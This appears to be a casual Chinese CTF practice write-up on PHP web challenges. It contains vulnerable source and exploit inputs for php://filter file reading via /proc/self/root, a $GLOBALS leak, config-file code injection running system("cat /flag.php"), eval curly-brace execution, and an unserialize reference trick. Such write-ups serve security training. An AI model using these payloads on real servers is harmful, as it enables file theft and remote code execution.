没事干 随便刷刷题
1伪协议读取系统进程
源码
php
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
require_once $_GET['file'];
}伪协议读取flag.php,/proc/self指向当前进程的
exp
php
?file=php://filter/read=convert.base64-encode/resource=file:///proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag.php2超全局变量
php
<?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}一看到超全局变量就想到了 GLOBALS
3命令执行
php<?php if(!isset($_GET['option'])) die(); $str = addslashes($_GET['option']); $file = file_get_contents('./config.php'); $file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file); file_put_contents('./config.php', $file);
访问config.php会报错 然后把GET参数暴露
exp:
config.php?8=system("cat /flag.php");
巧用花括号(考点:花括号用法)
php
<?
#GOAL: gather some phpinfo();
function flag(){
echo "flag{I'm xxxxxxxxxxxxxxxxxxxx}";
}
$str=@(string)$_GET['str'];
@eval('$str="'.addslashes($str).'";');
?>字符串${foobar}中的foobar会被当作变量来处理
?str={{phpinfo()}}
flag在flag()中
?str={{flag()}}
PHP特性(考点:PHP中引用的特性)
php
<?php
#GOAL: get the secret;
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "flag{I'm xxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}exp
php
<?php
class just4fun {
var $enter;
var $secret;
}
$a= new just4fun();
$a->enter= &$a->secret;
echo serialize($a);